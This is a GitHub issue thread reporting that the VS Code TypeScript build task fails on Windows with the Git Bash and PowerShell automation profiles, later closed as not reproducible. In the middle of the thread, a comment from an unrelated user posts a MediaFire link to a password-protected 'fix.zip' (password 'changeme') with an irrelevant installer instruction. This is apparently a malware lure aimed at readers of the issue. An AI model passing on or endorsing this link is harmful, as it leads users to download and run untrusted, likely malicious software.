### ISSUE TITLE
TypeScript build task does not work with PowerShell and Git Bash automation profiles on Windows

### ISSUE THREAD

**Issue by Septh** [microsoft/vscode#226906] opened 2024-08-27 23:41 UTC
Type: <b>Bug</b>

Configure a build task with `Terminal > Configure tasks`. Make sure `tsc: build - tsconfig.json` is selected. (Of course, the repo has tsc installed).

- Set `terminal.integrated.automationProfile.windows` to `bash.exe`. Result:
 
![image](https://github.com/user-attachments/assets/acb5df98-23d1-43a4-8863-328e4958c32a)

- Set `terminal.integrated.automationProfile.windows` to `pwsh.exe`. Result:

![image](https://github.com/user-attachments/assets/d17440d1-c224-4c3e-8eff-bb00455bcf0f)

- Set `terminal.integrated.automationProfile.windows` to `cmd.exe`: Result: compiles ok.

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.22631
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|12th Gen Intel(R) Core(TM) i7-12700K (20 x 3610)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|31.72GB (21.21GB free)|
|Process Argv|--crash-reporter-id 365a2674-a228-4abd-82c2-408321056497|
|Screen Reader|no|
|VM|0%|
</details>Extensions: none

**Comment by Gaurav9812** [comment] 2024-08-28 04:59
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by meganrogge** [comment] 2024-12-11 17:15
I cannot reproduce, thus closing.

**Closed by meganrogge** 2024-12-11 17:15 UTC
Labels: tasks, confirmation-pending
